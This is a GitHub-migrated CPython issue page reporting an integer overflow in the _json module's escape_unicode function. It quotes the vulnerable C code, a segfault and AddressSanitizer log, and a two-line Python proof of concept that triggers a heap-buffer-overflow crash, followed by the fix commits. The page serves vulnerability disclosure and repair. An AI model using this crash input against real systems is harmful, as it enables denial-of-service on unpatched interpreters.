Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Integer overflow in _json_encode_unicode leads to crash (heap-buffer-overflow) #68710

Closed
benjaminp opened this issue Jun 27, 2015 · 2 comments
Closed

Integer overflow in _json_encode_unicode leads to crash (heap-buffer-overflow) #68710

benjaminp opened this issue Jun 27, 2015 · 2 comments
Labels
extension-modules C modules in the Modules dir type-security A security issue

Comments

@benjaminp
Copy link
Contributor

BPO 24522
Nosy @benjaminp

Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state.

Show more details

GitHub fields:

assignee = None
closed_at = <Date 2015-06-27.20:01:23.920>
created_at = <Date 2015-06-27.20:00:12.180>
labels = ['type-security', 'extension-modules']
title = 'Integer overflow in _json_encode_unicode leads to crash (heap-buffer-overflow)'
updated_at = <Date 2015-06-28.12:43:16.130>
user = 'https://github.com/benjaminp'

bugs.python.org fields:

activity = <Date 2015-06-28.12:43:16.130>
actor = 'Arfrever'
assignee = 'none'
closed = True
closed_date = <Date 2015-06-27.20:01:23.920>
closer = 'python-dev'
components = ['Extension Modules']
creation = <Date 2015-06-27.20:00:12.180>
creator = 'benjamin.peterson'
dependencies = []
files = []
hgrepos = []
issue_num = 24522
keywords = []
message_count = 2.0
messages = ['245891', '245892']
nosy_count = 3.0
nosy_names = ['benjamin.peterson', 'Arfrever', 'python-dev']
pr_nums = []
priority = 'normal'
resolution = 'fixed'
stage = 'resolved'
status = 'closed'
superseder = None
type = 'security'
url = 'https://bugs.python.org/issue24522'
versions = ['Python 3.5', 'Python 3.6']
@benjaminp
Copy link
Contributor Author

Reported by Brendon Tiszka on the security list:

# static PyObject *
# escape_unicode(PyObject *pystr)
# {
# /* Take a PyUnicode pystr and return a new escaped PyUnicode */
# Py_ssize_t i;
# Py_ssize_t input_chars;
# Py_ssize_t output_size;
# Py_ssize_t chars;
# PyObject *rval;
# void *input;
# int kind;
# Py_UCS4 maxchar;
#
# if (PyUnicode_READY(pystr) == -1)
# return NULL;
#
# maxchar = PyUnicode_MAX_CHAR_VALUE(pystr);
# input_chars = PyUnicode_GET_LENGTH(pystr);
# input = PyUnicode_DATA(pystr);
# kind = PyUnicode_KIND(pystr);
#
# /* Compute the output size */
# for (i = 0, output_size = 2; i < input_chars; i++) {
# Py_UCS4 c = PyUnicode_READ(kind, input, i);
# switch (c) {
# case '\\': case '"': case '\b': case '\f':
# case '\n': case '\r': case '\t':
# output_size += 2;
# break;
# default:
# if (c <= 0x1f)
# output_size += 6;
# else
# output_size++;
# }
# }

# rval = PyUnicode_New(output_size, maxchar);

# 1.) if c is <= 0x1f then output_size += 6. There are no overflow checks on this variable.
# 2.) rval buffer is too small to hold results

# Crash:
# ------

# Program received signal SIGSEGV, Segmentation fault.
# 0xb7a2e9be in escape_unicode (pystr=pystr@entry=0x8cf81018)
# at /home/pail/cpython/Modules/_json.c:306
# 306 ENCODE_OUTPUT;

# OS info
# --------
# %./python -V
# > Python 3.6.0a0
# % uname -a
# Linux Pail0verflow 3.13.0-52-generic #85-Ubuntu SMP Wed Apr 29 16:44:56 UTC 2015 i686 i686 i686 GNU/Linux

# ASAN Info (details in other file)
# =================================================================
# ==6512== ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5c00000 at pc 0xb5f17356 bp 0xbfaa0eb8 sp 0xbfaa0eac
# WRITE of size 1 at 0xb5c00000 thread T0

import json

sp = "\x13"*715827883 #((2**32)/6 + 1)
json.dumps([sp], ensure_ascii=False)

@benjaminp benjaminp added extension-modules C modules in the Modules dir type-security A security issue labels Jun 27, 2015
@python-dev
Copy link
Mannequin

python-dev mannequin commented Jun 27, 2015

New changeset 0540e14c4b64 by Benjamin Peterson in branch '3.5':
prevent integer overflow in escape_unicode (closes bpo-24522)
https://hg.python.org/cpython/rev/0540e14c4b64

New changeset fc799b2edf21 by Benjamin Peterson in branch 'default':
merge 3.5 (bpo-24522)
https://hg.python.org/cpython/rev/fc799b2edf21

@python-dev python-dev mannequin closed this as completed Jun 27, 2015
@ezio-melotti ezio-melotti transferred this issue from another repository Apr 10, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
extension-modules C modules in the Modules dir type-security A security issue
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@benjaminp